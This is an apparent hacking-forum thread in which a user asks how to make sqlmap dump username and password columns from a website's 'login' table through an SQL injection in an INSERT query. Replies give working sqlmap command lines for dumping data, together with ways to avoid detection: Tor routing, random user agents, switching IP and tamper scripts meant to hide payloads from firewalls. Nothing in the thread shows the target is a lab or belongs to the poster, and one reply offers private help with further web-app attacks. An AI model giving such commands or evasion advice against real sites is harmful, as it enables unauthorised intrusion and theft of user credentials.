Hey,

Let's say I have a website that has a SQL injection vulnerability inside an insert query. So i.e.:

Insert into login(username, password) values ('[injection point]','')

Initially SQLmap found the database name and the table name. I got the column names through a manual
method but eventually I got it also working through SQLmap with the -technique=B parameter (blind) to get
the columns of the table "login".

The last step is to get the actual data using these values but SQLmap isn't helping me. I get the following
message: "unable to retrieve the number of entries for table 'login' in database [database]". Isn't that strange
as it is able to get the database/table/column names?

The thing is that I found a way to do this manually with a script, but I also want to learn SQLmap. So does
anyone have a way to exploit such vulnerability with SQLmap?

One of the commands I did is as following:
sqlmap -r request.txt --random-agent --technique=B -p username --dump-all -D [database] -T login -C id,username

If it's not possible then I could make a tutorial on how this can be manually done, but I prefer SQLmap because
I have the feeling it should be possible.

One error you have is having "--dump-all", this will dump all of the content from the DB, you should use instead "--dump" which will only dump the selected data.

For your main issue;

Maybe the site has some poorly configured firewall which blocks SQLMAP injections but does not block manual injections?

You could try running it with -v 6 (default value is 1) setting, this will print all the HTML responses to your view, and see if it experiences some errors / blocks.

(June 9, 2022, 05:02 PM)TheFlusha Wrote: One error you have is having "--dump-all", this will dump all of the content from the DB, you should use instead "--dump" which will only dump the selected data.

For your main issue;

Maybe the site has some poorly configured firewall which blocks SQLMAP injections but does not block manual injections?

You could try running it with -v 6 (default value is 1) setting, this will print all the HTML responses to your view, and see if it experiences some errors / blocks.

ah yea good one didn't notice that. Using --dump I get the following:
"unable to retrieve the number of column(s) 'id,username' entries for table 'login' in database [database]"
I will continue to test some stuff, thanks for the suggestion ^^

To me it looks like you are getting blocked... try --delay --time-sec --timeout also hex / no-cast... random-agent. Also try --tamper option you got a variety of tamper scripts to try... Consider switching IP...etc etc.. many things you can try...

sqlmap -u "targeturl" --level=5 --risk=3 -o --dbs --answer="crack=n" --tor --check-tor --tor-type=socks5 --tor-port=9050 --no-cast --random-agent 

or for dumping multiple columns you can do something like this username,user,password --dump if this doesn't work try playing with tamper script space2comment.py,space2hash.py, space2mysqlblank.py can be used if it's mysql database, charunicodeencode.py, percentage.py to hide payloads against ASP/ASP.NET applications
like this

--dbms=mysql --tamper="space2comment.py,space2hash.py,space2mysqlblank.py,apostrophemask.py,apostrophenullencode.py,appendnullbyte.py,between.py" --tor --check-tor --tor-type=socks5 --tor-port=9050 --no-cast --random-agent

use --dump-all maybe too late but sorry, you can also send me PM if you neeed help in the future for SQL injections or other webapp vulnz